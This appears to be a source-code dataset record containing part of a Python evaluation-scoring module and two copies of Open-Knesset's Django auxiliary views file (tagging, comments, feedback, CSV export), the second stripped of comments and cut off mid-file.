return DataFrame(cases)
def validate(self):
self._validate_data_frame(df=self._ground_truth_cases)
self._validate_data_frame(df=self._predictions_cases)
def _validate_data_frame(self, *, df: DataFrame):
for validator in self._validators:
validator.validate(df=df)
@abstractmethod
def merge_ground_truth_and_predictions(self):
pass
@abstractmethod
def cross_validate(self):
pass
def _raise_missing_predictions_error(self, *, missing=None):
if missing is not None:
message = (
"Predictions missing: you did not submit predictions for "
f"{missing}. Please try again."
)
else:
message = (
"Predictions missing: you did not submit enough predictions, "
"please try again."
)
raise ValidationError(message)
def _raise_extra_predictions_error(self, *, extra=None):
if extra is not None:
message = (
"Too many predictions: we do not have the ground truth data "
f"for {extra}. Please try again."
)
else:
message = (
"Too many predictions: you submitted too many predictions, "
"please try again."
)
raise ValidationError(message)
@abstractmethod
def score(self):
pass
# noinspection PyUnusedLocal
def score_case(self, *, idx: int, case: DataFrame) -> Dict:
return {}
def score_aggregates(self) -> Dict:
aggregate_results = {}
for col in self._case_results.columns:
aggregate_results[col] = self.aggregate_series(
series=self._case_results[col]
)
return aggregate_results
def aggregate_series(self, *, series: Series) -> Dict:
summary = series.describe()
valid_keys = [a for a in self._aggregates if a in summary]
series_summary = {}
for k in valid_keys:
value = summary[k]
# % in keys could cause problems when looking up values later
key = k.replace("%", "pc")
try:
json.dumps(value)
except TypeError:
logger.warning(
f"Could not serialize {key}: {value} as json, "
f"so converting {value} to int."
)
value = int(value)
series_summary[key] = value
return series_summary
def save(self):
with open(self._output_file, "w") as f:
f.write(json.dumps(self._metrics))
class ClassificationEvaluation(BaseEvaluation):
def merge_ground_truth_and_predictions(self):
if self._join_key:
kwargs = {"on": self._join_key}
else:
kwargs = {"left_index": True, "right_index": True}
self._cases = merge(
left=self._ground_truth_cases,
right=self._predictions_cases,
indicator=True,
how="outer",
suffixes=("_ground_truth", "_prediction"),
**kwargs,
)
def cross_validate(self):
missing = [
p for _, p in self._cases.iterrows() if p["_merge"] == "left_only"
]
if missing:
if self._join_key:
missing = [p[self._join_key] for p in missing]
self._raise_missing_predictions_error(missing=missing)
extra = [
p for _, p in self._cases.iterrows() if p["_merge"] == "right_only"
]
if extra:
if self._join_key:
extra = [p[self._join_key] for p in extra]
self._raise_extra_predictions_error(extra=extra)
def score(self):
self._case_results = DataFrame()
for idx, case in self._cases.iterrows():
self._case_results = self._case_results.append(
self.score_case(idx=idx, case=case), ignore_index=True
)
self._aggregate_results = self.score_aggregates()
class Evaluation(ClassificationEvaluation):
def __init__(self, *args, **kwargs):
warn(
(
"The Evaluation class is deprecated, "
"please use ClassificationEvaluation instead"
),
DeprecationWarning,
)
super().__init__(*args, **kwargs)
class DetectionEvaluation(BaseEvaluation):
def __init__(self, *args, detection_radius, detection_threshold, **kwargs):
super().__init__(*args, **kwargs)
self._detection_radius = detection_radius
self._detection_threshold = detection_threshold
def merge_ground_truth_and_predictions(self):
self._cases = concat(
[self._ground_truth_cases, self._predictions_cases],
keys=["ground_truth", "predictions"],
)
def cross_validate(self):
expected_keys = set(self._ground_truth_cases[self._join_key])
submitted_keys = set(self._predictions_cases[self._join_key])
missing = expected_keys - submitted_keys
if missing:
self._raise_missing_predictions_error(missing=missing)
extra = submitted_keys - expected_keys
if extra:
self._raise_extra_predictions_error(extra=extra)
def _raise_extra_predictions_error(self, *, extra=None):
warn(f"There are extra predictions for cases: {extra}.")
def _raise_missing_predictions_error(self, *, missing=None):
warn(f"Could not find predictions for cases: {missing}.")
def score(self):
cases = set(self._ground_truth_cases[self._join_key])
cases |= set(self._predictions_cases[self._join_key])
self._case_results = DataFrame()
for idx, case in enumerate(cases):
self._case_results = self._case_results.append(
self.score_case(
idx=idx,
case=self._cases.loc[self._cases[self._join_key] == case],
),
ignore_index=True,
)
self._aggregate_results = self.score_aggregates()
def score_case(self, *, idx, case):
score = score_detection(
ground_truth=self.get_points(case=case, key="ground_truth"),
predictions=self.get_points(case=case, key="predictions"),
radius=self._detection_radius,
)
# Add the case id to the score
output = score._asdict()
output.update({self._join_key: case[self._join_key][0]})
return output
def get_points(
self, *, case, key: str
) -> List[Tuple[Union[int, float], Union[int, float]]]:
raise NotImplementedError
def score_aggregates(self):
aggregate_results = super().score_aggregates()
totals = self._case_results.sum()
for s in totals.index:
aggregate_results[s]["sum"] = totals[s]
tp = aggregate_results["true_positives"]["sum"]
fp = aggregate_results["false_positives"]["sum"]
fn = aggregate_results["false_negatives"]["sum"]
aggregate_results["precision"] = tp / (tp + fp)
aggregate_results["recall"] = tp / (tp + fn)
aggregate_results["f1_score"] = 2 * tp / ((2 * tp) + fp + fn)
return aggregate_results
| true | true |
f7fa40ec5aa438fecbe7602876ea17b732a736ff | 23,891 | py | Python | auxiliary/views.py | Tudmotu/Open-Knesset | 005adff8422ad34af8f78b0f32e7052b65a5bad3 | [
"BSD-3-Clause"
] | 1 | 2018-12-11T01:43:25.000Z | 2018-12-11T01:43:25.000Z | auxiliary/views.py | Tudmotu/Open-Knesset | 005adff8422ad34af8f78b0f32e7052b65a5bad3 | [
"BSD-3-Clause"
] | null | null | null | auxiliary/views.py | Tudmotu/Open-Knesset | 005adff8422ad34af8f78b0f32e7052b65a5bad3 | [
"BSD-3-Clause"
] | null | null | null | import csv, random, tagging, logging
from actstream import action
from annotatetext.views import post_annotation as annotatetext_post_annotation
from django.conf import settings
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.http import (
HttpResponseForbidden, HttpResponseRedirect, HttpResponse,
HttpResponseNotAllowed, HttpResponseBadRequest, Http404, HttpResponsePermanentRedirect)
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.utils import simplejson as json
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView, DetailView, ListView
from django.views.generic.list import BaseListView
from django.views.decorators.http import require_http_methods
from tagging.models import Tag, TaggedItem
from .forms import TidbitSuggestionForm, FeedbackSuggestionForm, TagSuggestionForm
from .models import Tidbit, TagSuggestion
from committees.models import CommitteeMeeting
from events.models import Event
from knesset.utils import notify_responsible_adult
from laws.models import Vote, Bill
from mks.models import Member, Knesset
from tagging.utils import get_tag
from auxiliary.models import TagSynonym
class BaseTagMemberListView(ListView):
    """Generic helper for common tagged objects and optionally member
    operations. Should be inherited by others"""
    url_to_reverse = None # override in inherited for reversing tag_url
    # in context
    @property
    def tag_instance(self):
        """Resolve (and cache) the Tag named in the URL kwargs; 404 if unknown."""
        if not hasattr(self, '_tag_instance'):
            tag = self.kwargs['tag']
            self._tag_instance = get_tag(tag)
            if self._tag_instance is None:
                raise Http404(_('No Tag found matching "%s".') % tag)
        return self._tag_instance
    @property
    def member(self):
        """Resolve (and cache) the optional ``?member=<id>`` query param.

        Returns None when absent; 404 on a non-integer or unknown id.
        """
        if not hasattr(self, '_member'):
            member_id = self.request.GET.get('member', False)
            if member_id:
                try:
                    member_id = int(member_id)
                except ValueError:
                    raise Http404(
                        _('No Member found matching "%s".') % member_id)
                self._member = get_object_or_404(Member, pk=member_id)
            else:
                self._member = None
        return self._member
    def get_context_data(self, *args, **kwargs):
        """Add tag, optional member and the user's watched members to context."""
        context = super(BaseTagMemberListView, self).get_context_data(
            *args, **kwargs)
        context['tag'] = self.tag_instance
        context['tag_url'] = reverse(self.url_to_reverse,
                                     args=[self.tag_instance])
        if self.member:
            context['member'] = self.member
            context['member_url'] = reverse(
                'member-detail', args=[self.member.pk])
        user = self.request.user
        if user.is_authenticated():
            context['watched_members'] = user.get_profile().members
        else:
            context['watched_members'] = False
        return context
logger = logging.getLogger("open-knesset.auxiliary.views")
def help_page(request):
    """Render the language-specific help page.

    The context (random member, vote, bill and a sample of the tag
    cloud) is cached for five minutes; the tag cloud itself is cached
    separately for LONG_CACHE_TIME.
    """
    context = cache.get('help_page_context')
    if not context:
        context = {}
        context['title'] = _('Help')
        # NOTE(review): randrange raises ValueError when a queryset is
        # empty -- assumes a populated database.
        context['member'] = Member.current_knesset.all()[random.randrange(Member.current_knesset.count())]
        votes = Vote.objects.filter_and_order(order='controversy')
        context['vote'] = votes[random.randrange(votes.count())]
        context['bill'] = Bill.objects.all()[random.randrange(Bill.objects.count())]
        tags_cloud = cache.get('tags_cloud', None)
        if not tags_cloud:
            # NOTE(review): `calculate_cloud_from_models` is not among this
            # file's visible imports -- presumably defined or imported
            # elsewhere in the module; verify.
            tags_cloud = calculate_cloud_from_models(Vote,Bill,CommitteeMeeting)
            tags_cloud.sort(key=lambda x:x.name)
            cache.set('tags_cloud', tags_cloud, settings.LONG_CACHE_TIME)
        context['tags'] = random.sample(tags_cloud,
                                        min(len(tags_cloud),8)
                                        ) if tags_cloud else None
        context['has_search'] = False # enable the base template search
        cache.set('help_page_context', context, 300) # 5 Minutes
    template_name = '%s.%s%s' % ('help_page', settings.LANGUAGE_CODE, '.html')
    return render_to_response(template_name, context, context_instance=RequestContext(request))
def add_previous_comments(comments):
    """Attach each comment's earlier same-object comments.

    Sets ``previous_comments`` and ``is_comment`` on every comment, then
    returns only the comments that are not themselves a "previous"
    comment of another one in the input.
    """
    seen_earlier = set()
    for comment in comments:
        earlier = Comment.objects.filter(
            object_pk=comment.object_pk,
            content_type=comment.content_type,
            submit_date__lt=comment.submit_date,
        ).select_related('user')
        comment.previous_comments = earlier
        seen_earlier.update(earlier)
        comment.is_comment = True
    return [comment for comment in comments if comment not in seen_earlier]
def get_annotations(comments, annotations):
    """Merge annotations and comments into one feed, newest first.

    Annotations get a ``submit_date`` attribute (copied from their
    ``timestamp``) so both kinds sort on the same field. The given
    ``annotations`` list is extended in place and returned.
    """
    for annotation in annotations:
        annotation.submit_date = annotation.timestamp
    annotations.extend(add_previous_comments(comments))
    annotations.sort(key=lambda item: item.submit_date, reverse=True)
    return annotations
def main(request):
    """Render the home page, or handle a POSTed Tidbit suggestion.

    Note on annotations:
    Old:
    Return annotations by concatenating Annotation last 10 and Comment last
    10, adding all related comments (comments on same item that are older).
    New:
    Return annotations by Action filtered to include only:
    annotation-added (to meeting), ignore annotated (by user)
    comment-added
    (The cached-context implementation of the above was removed as dead,
    commented-out code; see VCS history.)
    """
    # did we post the TidbitSuggest form ?
    if request.method == 'POST':
        # Only logged-in users can suggest. ``is_authenticated`` is a
        # method in this Django version and must be *called*: the bare
        # bound method is always truthy, so the original un-called check
        # never rejected anonymous users.
        if not request.user.is_authenticated():
            return HttpResponseForbidden()
        form = TidbitSuggestionForm(request.POST)
        if form.is_valid():
            form.save(request)
        return form.get_response()
    NUMOF_EVENTS = 8
    events = Event.objects.get_upcoming()
    context = {
        'title': _('Home'),
        'hide_crumbs': True,
        'is_index': True,
        'tidbits': Tidbit.active.all().order_by('?'),
        'suggestion_forms': {'tidbit': TidbitSuggestionForm()},
        'events': events[:NUMOF_EVENTS],
        'INITIAL_EVENTS': NUMOF_EVENTS,
        'events_more': events.count() > NUMOF_EVENTS,
    }
    template_name = '%s.%s%s' % ('main', settings.LANGUAGE_CODE, '.html')
    return render_to_response(template_name, context,
                              context_instance=RequestContext(request))
@require_http_methods(['POST'])
def post_feedback(request):
    """Post a feedback suggestion form (authenticated users only)."""
    # ``is_authenticated`` is a method in this Django version and must be
    # called -- without the parentheses the bound method is always truthy
    # and anonymous users were never rejected.
    if not request.user.is_authenticated():
        return HttpResponseForbidden()
    form = FeedbackSuggestionForm(request.POST)
    if form.is_valid():
        form.save(request)
    return form.get_response()
@require_http_methods(['POST'])
def suggest_tag_post(request):
    """Post a tag suggestion form (authenticated users only).

    Creates a TagSuggestion attached to the object identified by the
    posted app_label/object_type/object_id fields.
    """
    # ``is_authenticated`` is a method in this Django version and must be
    # called -- the bare bound method is always truthy, so the original
    # check never rejected anonymous users.
    if not request.user.is_authenticated():
        return HttpResponseForbidden()
    form = TagSuggestionForm(request.POST)
    if form.is_valid():
        content_type = ContentType.objects.get_by_natural_key(
            form.cleaned_data['app_label'], form.cleaned_data['object_type'])
        # local renamed from ``object`` to avoid shadowing the builtin
        suggested_object = content_type.get_object_for_this_type(
            pk=form.cleaned_data['object_id'])
        ts = TagSuggestion(
            name=form.cleaned_data['name'],
            suggested_by=request.user,
            object=suggested_object
        )
        ts.save()
    return form.get_response()
def post_annotation(request):
    """Forward to annotatetext's post view for users allowed to annotate."""
    if not request.user.has_perm('annotatetext.add_annotation'):
        return HttpResponseForbidden(
            _("Sorry, you do not have the permission to annotate."))
    return annotatetext_post_annotation(request)
def search(request, lang='he'):
    """Render the Google custom search page for the given language."""
    # Drop the 'cof' parameter so the page linked to by the javascript
    # fallback doesn't think it is inside an iframe.
    params = request.GET.copy()
    params.pop('cof', None)
    context = RequestContext(request, {
        'query': request.GET.get('q'),
        'query_string': params.urlencode(),
        'has_search': True,
        'lang': lang,
        'cx': settings.GOOGLE_CUSTOM_SEARCH,
    })
    return render_to_response('search/search.html', context)
def post_details(request, post_id):
    ''' patching django-planet's post_detail view so it would update the
    hitcount and redirect to the post's url
    '''
    from hitcount.views import _update_hit_count
    from hitcount.models import HitCount
    from planet.models import Post
    # update the hit count
    ctype = ContentType.objects.get(app_label="planet", model="post")
    hitcount, created = HitCount.objects.get_or_create(content_type=ctype,
                                                       object_pk=post_id)
    # called for its side effect; the return value is intentionally unused
    result = _update_hit_count(request, hitcount)
    post = get_object_or_404(Post, pk=post_id)
    return HttpResponseRedirect(post.url)
class RobotsView(TemplateView):
    """Serve the robots.txt template with a text/plain content type."""
    template_name = 'robots.txt'
    def render_to_response(self, context, **kwargs):
        parent = super(RobotsView, self)
        return parent.render_to_response(
            context, content_type='text/plain', **kwargs)
class AboutView(TemplateView):
    """About template"""
    # Static page rendered with the default TemplateView behaviour.
    template_name = 'about.html'
class CommentsView(ListView):
    """Comments index view: newest comments first, paginated."""
    model = Comment
    queryset = Comment.objects.order_by("-submit_date")
    paginate_by = 20  # comments per page
def _add_tag_to_object(user, app, object_type, object_id, tag):
    """Tag the given object with `tag` on behalf of `user`, record an
    activity-stream action, and return a small JS-parseable response."""
    content_type = ContentType.objects.get_by_natural_key(app, object_type)
    (tagged_item, _created) = TaggedItem._default_manager.get_or_create(
        tag=tag,
        content_type=content_type,
        object_id=object_id)
    action.send(user, verb='tagged', target=tagged_item,
                description='%s' % (tag.name))
    detail_url = reverse('tag-detail', kwargs={'slug': tag.name})
    return HttpResponse("{'id':%d, 'name':'%s', 'url':'%s'}" % (tag.id,
                                                                tag.name,
                                                                detail_url))
@login_required
def add_tag_to_object(request, app, object_type, object_id):
    """add a POSTed tag_id to object_type object_id by the current user"""
    # only a POST carrying a tag_id is a valid submission
    if request.method != 'POST' or 'tag_id' not in request.POST:
        return HttpResponseNotAllowed(['POST'])
    tag = get_object_or_404(Tag, pk=request.POST['tag_id'])
    return _add_tag_to_object(request.user, app, object_type, object_id, tag)
@login_required
def remove_tag_from_object(request, app, object_type, object_id):
    """remove a POSTed tag_id from object_type object_id"""
    ctype = ContentType.objects.get_by_natural_key(app, object_type)
    if request.method == 'POST' and 'tag_id' in request.POST:
        tag = get_object_or_404(Tag, pk=request.POST['tag_id'])
        tagged_items = TaggedItem._default_manager.filter(
            tag=tag, content_type=ctype, object_id=object_id)
        if len(tagged_items) == 1:
            ti = tagged_items[0]
            logger.debug('user %s is deleting tagged item %d' %
                         (request.user.username, ti.id))
            ti.delete()
            action.send(request.user, verb='removed-tag', target=ti,
                        description='%s' % (tag.name))
        else:
            # either the object isn't tagged with this tag, or (a data
            # error) it is tagged more than once; both are only logged
            logger.debug('user %s tried removing tag %d from object, but failed, because len(tagged_items)!=1' % (request.user.username, tag.id))
        return HttpResponse("{'id':%d,'name':'%s'}" % (tag.id, tag.name))
    # fix: a non-POST request used to fall through with no return value
    # (i.e. return None), which breaks Django's response handling; reject
    # it explicitly, the same way add_tag_to_object does.
    return HttpResponseNotAllowed(['POST'])
@permission_required('tagging.add_tag')
def create_tag_and_add_to_item(request, app, object_type, object_id):
    """adds tag with name=request.POST['tag'] to the tag list, and tags the given object with it
    ****
    Currently not used anywhere, since we don't want to allow users to add
    more tags for now.
    """
    if request.method == 'POST' and 'tag' in request.POST:
        tag = request.POST['tag'].strip()
        # bug fix: the old code called .encode('utf8') on the *format
        # string* (a no-op for an ASCII literal) and only then %-formatted
        # unicode values into it, so msg was never actually utf-8 encoded.
        # Format first, then encode the result.
        msg = ("user %s is creating tag %s on object_type %s and object_id %s"
               % (request.user.username, tag, object_type, object_id)).encode('utf8')
        logger.info(msg)
        notify_responsible_adult(msg)
        # reject very short (likely junk) tag names
        if len(tag) < 3:
            return HttpResponseBadRequest()
        tags = Tag.objects.filter(name=tag)
        if not tags:
            try:
                tag = Tag.objects.create(name=tag)
            except Exception:
                logger.warn("can't create tag %s" % tag)
                return HttpResponseBadRequest()
        if len(tags) == 1:
            tag = tags[0]
        if len(tags) > 1:
            # duplicate tag names indicate a data problem; bail out
            logger.warn("More than 1 tag: %s" % tag)
            return HttpResponseBadRequest()
        return _add_tag_to_object(request.user, app, object_type, object_id, tag)
    else:
        return HttpResponseNotAllowed(['POST'])
def calculate_cloud_from_models(*args):
    """Merge the tag clouds of all the given models into a single cloud.

    A tag appearing in several models' clouds gets the sum of its
    per-model counts.
    """
    from tagging.models import Tag
    cloud = Tag._default_manager.cloud_for_model(args[0])
    # keep an index of each tag's position so merging is O(1) per tag,
    # instead of the old O(n) list.index() scan per tag
    position = dict((t, i) for i, t in enumerate(cloud))
    for model in args[1:]:
        for tag in Tag._default_manager.cloud_for_model(model):
            if tag in position:
                cloud[position[tag]].count += tag.count
            else:
                position[tag] = len(cloud)
                cloud.append(tag)
    return tagging.utils.calculate_cloud(cloud)
class TagList(ListView):
    """Tags index view, with a cached tag cloud over votes, bills and
    committee meetings."""
    model = Tag
    template_name = 'auxiliary/tag_list.html'

    def get_queryset(self):
        return Tag.objects.all()

    def get_context_data(self, **kwargs):
        context = super(TagList, self).get_context_data(**kwargs)
        cloud = cache.get('tags_cloud', None)
        if not cloud:
            # expensive to compute, so keep it cached for a long while
            cloud = calculate_cloud_from_models(Vote, Bill, CommitteeMeeting)
            cloud.sort(key=lambda t: t.name)
            cache.set('tags_cloud', cloud, settings.LONG_CACHE_TIME)
        context['tags_cloud'] = cloud
        return context
class TagDetail(DetailView):
    """Detail page for a single tag: the bills, votes and committee
    meetings carrying it, plus member tag clouds (current and previous
    knessets)."""
    model = Tag
    template_name = 'auxiliary/tag_detail.html'
    slug_field = 'name'

    @staticmethod
    def _members_cloud(counts, limit):
        """Turn a {member: count} dict into a tag cloud of the `limit`
        most-counted members."""
        # Py2's deprecated cmp= sort replaced with the equivalent
        # key=/reverse= form (both sorts are stable)
        top = dict(sorted(counts.items(),
                          key=lambda item: item[1],
                          reverse=True)[:limit])
        for member in top:
            member.count = counts[member]
        return tagging.utils.calculate_cloud(top)

    def create_tag_cloud(self, tag, limit=30, bills=None, votes=None,
                         cms=None):
        """
        Create tag cloud for tag <tag>. Returns only the <limit> most
        tagged members, as a (current knesset, previous knessets) pair.
        """
        try:
            mk_limit = int(self.request.GET.get('limit', limit))
        except ValueError:
            mk_limit = limit
        if bills is None:
            bills = TaggedItem.objects.get_by_model(Bill, tag)\
                .prefetch_related('proposers')
        if votes is None:
            votes = TaggedItem.objects.get_by_model(Vote, tag)\
                .prefetch_related('votes')
        if cms is None:
            cms = TaggedItem.objects.get_by_model(CommitteeMeeting, tag)\
                .prefetch_related('mks_attended')
        mk_taggeds = [(b.proposers.all(), b.stage_date) for b in bills]
        mk_taggeds += [(v.votes.all(), v.time.date()) for v in votes]
        mk_taggeds += [(cm.mks_attended.all(), cm.date) for cm in cms]
        current_k_start = Knesset.objects.current_knesset().start_date
        # member -> number of tagged Bills/Votes/CommitteeMeetings in this
        # tag, split between the current knesset and everything earlier
        current_counts = {}
        previous_counts = {}
        for tagged, date in mk_taggeds:
            if date and (date > current_k_start):
                counts = current_counts
            else:  # not current knesset (or undated)
                counts = previous_counts
            for member in tagged:
                # bug fix: the previous-knessets branch used to read its
                # running total from the *current* dict (d.get(p, 0)),
                # producing wrong counts; each dict now accumulates
                # independently.
                counts[member] = counts.get(member, 0) + 1
        return (self._members_cloud(current_counts, mk_limit),
                self._members_cloud(previous_counts, mk_limit))

    def get(self, *args, **kwargs):
        """Permanently redirect tag synonyms to their canonical tag page."""
        tag = self.get_object()
        synonyms = TagSynonym.objects.filter(synonym_tag=tag)
        if len(synonyms) > 0:
            proper = synonyms[0].tag
            url = reverse('tag-detail', kwargs={'slug': proper.name})
            return HttpResponsePermanentRedirect(url)
        else:
            return super(TagDetail, self).get(*args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(TagDetail, self).get_context_data(**kwargs)
        tag = context['object']
        bills_ct = ContentType.objects.get_for_model(Bill)
        bill_ids = TaggedItem.objects.filter(
            tag=tag,
            content_type=bills_ct).values_list('object_id', flat=True)
        context['bills'] = Bill.objects.filter(id__in=bill_ids)
        votes_ct = ContentType.objects.get_for_model(Vote)
        vote_ids = TaggedItem.objects.filter(
            tag=tag, content_type=votes_ct).values_list('object_id', flat=True)
        context['votes'] = Vote.objects.filter(id__in=vote_ids)
        cm_ct = ContentType.objects.get_for_model(CommitteeMeeting)
        cm_ids = TaggedItem.objects.filter(
            tag=tag, content_type=cm_ct).values_list('object_id', flat=True)
        context['cms'] = CommitteeMeeting.objects.filter(id__in=cm_ids)
        (context['members'],
         context['past_members']) = self.create_tag_cloud(tag)
        return context
class CsvView(BaseListView):
    """A view which generates CSV files with information for a model queryset.
    Important class members to set when inheriting:

    * model -- the model to display information from.
    * queryset -- the query performed on the model; defaults to all.
    * filename -- the name of the resulting CSV file (e.g., "info.csv").
    * list_display - a list (or tuple) of tuples, where the first item in
      each tuple is the attribute (or the method) to display and
      the second item is the title of that column.

      The attribute can be a attribute on the CsvView child or the model
      instance itself. If it's a callable it'll be called with (obj, attr)
      for the CsvView attribute or without params for the model attribute.
    """
    filename = None
    list_display = None

    def dispatch(self, request, *args, **kwargs):
        """Stream the queryset as an attached CSV file.

        Fix: the old signature was dispatch(self, request) only, so any
        URLconf with captured args/kwargs raised a TypeError; accept and
        store them like Django's View.dispatch does.
        """
        if None in (self.filename, self.list_display, self.model):
            raise Http404()
        self.request = request
        self.args = args
        self.kwargs = kwargs
        response = HttpResponse(mimetype='text/csv')
        response['Content-Disposition'] = \
            'attachment; filename="{}"'.format(self.filename)
        object_list = self.get_queryset()
        self.prepare_csv_for_utf8(response)
        writer = csv.writer(response, dialect='excel')
        writer.writerow([title.encode('utf8')
                         for _, title in self.list_display])
        for obj in object_list:
            row = [self.get_display_attr(obj, attr)
                   for attr, _ in self.list_display]
            writer.writerow([unicode(item).encode('utf8') for item in row])
        return response

    def get_display_attr(self, obj, attr):
        """Return the display string for an attr, calling it if necessary."""
        # a view-level attribute shadows the model's; view callables get
        # (obj, attr), model callables are called with no arguments
        display_attr = getattr(self, attr, None)
        if display_attr is not None:
            if callable(display_attr):
                display_attr = display_attr(obj, attr)
        else:
            display_attr = getattr(obj, attr)
            if callable(display_attr):
                display_attr = display_attr()
        if display_attr is None:
            return ""
        return display_attr

    @staticmethod
    def prepare_csv_for_utf8(fileobj):
        """Prepend a byte order mark (BOM) to a file.

        When Excel opens a CSV file, it assumes the encoding is ASCII. The
        BOM directs it to decode the file with utf-8.
        """
        fileobj.write('\xef\xbb\xbf')
class GetMoreView(ListView):
    """A base view for feeding data to 'get more...' type of links.

    Returns a json result containing a partial of the rendered template:

        {
            "content": "....",
            "current": current page number,
            "total": total_pages,
            "has_next": true if a next page exists
        }

    The response is paginated. Since a "get more" link's target may already
    hold initial data, the `initial` GET param is taken into consideration,
    completing up to the page size.
    """

    def get_context_data(self, **kwargs):
        ctx = super(GetMoreView, self).get_context_data(**kwargs)
        raw_initial = self.request.GET.get('initial', '0')
        try:
            initial = int(raw_initial)
        except ValueError:
            initial = 0
        # `initial` only affects the first page
        if ctx['page_obj'].number > 1 or initial >= self.paginate_by - 1:
            initial = 0
        ctx['object_list'] = ctx['object_list'][initial:]
        return ctx

    def render_to_response(self, context, **response_kwargs):
        """Take the rendered content and shove it into json."""
        rendered = super(GetMoreView, self).render_to_response(
            context, **response_kwargs).render()
        page = context['page_obj']
        payload = {
            'content': rendered.content,
            'total': context['paginator'].num_pages,
            'current': page.number,
            'has_next': page.has_next(),
        }
        return HttpResponse(json.dumps(payload, ensure_ascii=False),
                            content_type='application/json')
def untagged_objects(request):
    """Render a page listing committee meetings, bills and votes that have
    no tags yet (up to 100 of each), together with their total counts."""
    untagged_cms = CommitteeMeeting.objects.filter_and_order(tagged=['false'])
    untagged_bills = Bill.objects.filter_and_order(tagged='false')
    untagged_votes = Vote.objects.filter_and_order(tagged='false')
    context = {
        'cms': untagged_cms[:100],
        'cms_count': untagged_cms.count(),
        'bills': untagged_bills[:100],
        'bill_count': untagged_bills.count(),
        'votes': untagged_votes[:100],
        'vote_count': untagged_votes.count(),
    }
    return render_to_response('auxiliary/untagged_objects.html', context,
                              context_instance=RequestContext(request))
| 39.294408 | 147 | 0.633544 | import csv, random, tagging, logging
from actstream import action
from annotatetext.views import post_annotation as annotatetext_post_annotation
from django.conf import settings
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.http import (
HttpResponseForbidden, HttpResponseRedirect, HttpResponse,
HttpResponseNotAllowed, HttpResponseBadRequest, Http404, HttpResponsePermanentRedirect)
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.utils import simplejson as json
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView, DetailView, ListView
from django.views.generic.list import BaseListView
from django.views.decorators.http import require_http_methods
from tagging.models import Tag, TaggedItem
from .forms import TidbitSuggestionForm, FeedbackSuggestionForm, TagSuggestionForm
from .models import Tidbit, TagSuggestion
from committees.models import CommitteeMeeting
from events.models import Event
from knesset.utils import notify_responsible_adult
from laws.models import Vote, Bill
from mks.models import Member, Knesset
from tagging.utils import get_tag
from auxiliary.models import TagSynonym
class BaseTagMemberListView(ListView):
url_to_reverse = None
@property
def tag_instance(self):
if not hasattr(self, '_tag_instance'):
tag = self.kwargs['tag']
self._tag_instance = get_tag(tag)
if self._tag_instance is None:
raise Http404(_('No Tag found matching "%s".') % tag)
return self._tag_instance
@property
def member(self):
if not hasattr(self, '_member'):
member_id = self.request.GET.get('member', False)
if member_id:
try:
member_id = int(member_id)
except ValueError:
raise Http404(
_('No Member found matching "%s".') % member_id)
self._member = get_object_or_404(Member, pk=member_id)
else:
self._member = None
return self._member
def get_context_data(self, *args, **kwargs):
context = super(BaseTagMemberListView, self).get_context_data(
*args, **kwargs)
context['tag'] = self.tag_instance
context['tag_url'] = reverse(self.url_to_reverse,
args=[self.tag_instance])
if self.member:
context['member'] = self.member
context['member_url'] = reverse(
'member-detail', args=[self.member.pk])
user = self.request.user
if user.is_authenticated():
context['watched_members'] = user.get_profile().members
else:
context['watched_members'] = False
return context
logger = logging.getLogger("open-knesset.auxiliary.views")
def help_page(request):
context = cache.get('help_page_context')
if not context:
context = {}
context['title'] = _('Help')
context['member'] = Member.current_knesset.all()[random.randrange(Member.current_knesset.count())]
votes = Vote.objects.filter_and_order(order='controversy')
context['vote'] = votes[random.randrange(votes.count())]
context['bill'] = Bill.objects.all()[random.randrange(Bill.objects.count())]
tags_cloud = cache.get('tags_cloud', None)
if not tags_cloud:
tags_cloud = calculate_cloud_from_models(Vote,Bill,CommitteeMeeting)
tags_cloud.sort(key=lambda x:x.name)
cache.set('tags_cloud', tags_cloud, settings.LONG_CACHE_TIME)
context['tags'] = random.sample(tags_cloud,
min(len(tags_cloud),8)
) if tags_cloud else None
context['has_search'] = False
cache.set('help_page_context', context, 300)
template_name = '%s.%s%s' % ('help_page', settings.LANGUAGE_CODE, '.html')
return render_to_response(template_name, context, context_instance=RequestContext(request))
def add_previous_comments(comments):
previous_comments = set()
for c in comments:
c.previous_comments = Comment.objects.filter(
object_pk=c.object_pk,
content_type=c.content_type,
submit_date__lt=c.submit_date).select_related('user')
previous_comments.update(c.previous_comments)
c.is_comment = True
comments = [c for c in comments if c not in previous_comments]
return comments
def get_annotations(comments, annotations):
for a in annotations:
a.submit_date = a.timestamp
comments = add_previous_comments(comments)
annotations.extend(comments)
annotations.sort(key=lambda x:x.submit_date,reverse=True)
return annotations
def main(request):
if request.method == 'POST':
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = TidbitSuggestionForm(request.POST)
if form.is_valid():
form.save(request)
return form.get_response()
NUMOF_EVENTS = 8
events = Event.objects.get_upcoming()
context = {
'title': _('Home'),
'hide_crumbs': True,
'is_index': True,
'tidbits': Tidbit.active.all().order_by('?'),
'suggestion_forms': {'tidbit': TidbitSuggestionForm()},
'events': events[:NUMOF_EVENTS],
'INITIAL_EVENTS': NUMOF_EVENTS,
'events_more': events.count() > NUMOF_EVENTS,
}
template_name = '%s.%s%s' % ('main', settings.LANGUAGE_CODE, '.html')
return render_to_response(template_name, context,
context_instance=RequestContext(request))
@require_http_methods(['POST'])
def post_feedback(request):
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = FeedbackSuggestionForm(request.POST)
if form.is_valid():
form.save(request)
return form.get_response()
@require_http_methods(['POST'])
def suggest_tag_post(request):
if not request.user.is_authenticated:
return HttpResponseForbidden()
form = TagSuggestionForm(request.POST)
if form.is_valid():
content_type = ContentType.objects.get_by_natural_key(form.cleaned_data['app_label'], form.cleaned_data['object_type'])
object = content_type.get_object_for_this_type(pk=form.cleaned_data['object_id'])
ts = TagSuggestion(
name=form.cleaned_data['name'],
suggested_by=request.user,
object=object
)
ts.save()
return form.get_response()
def post_annotation(request):
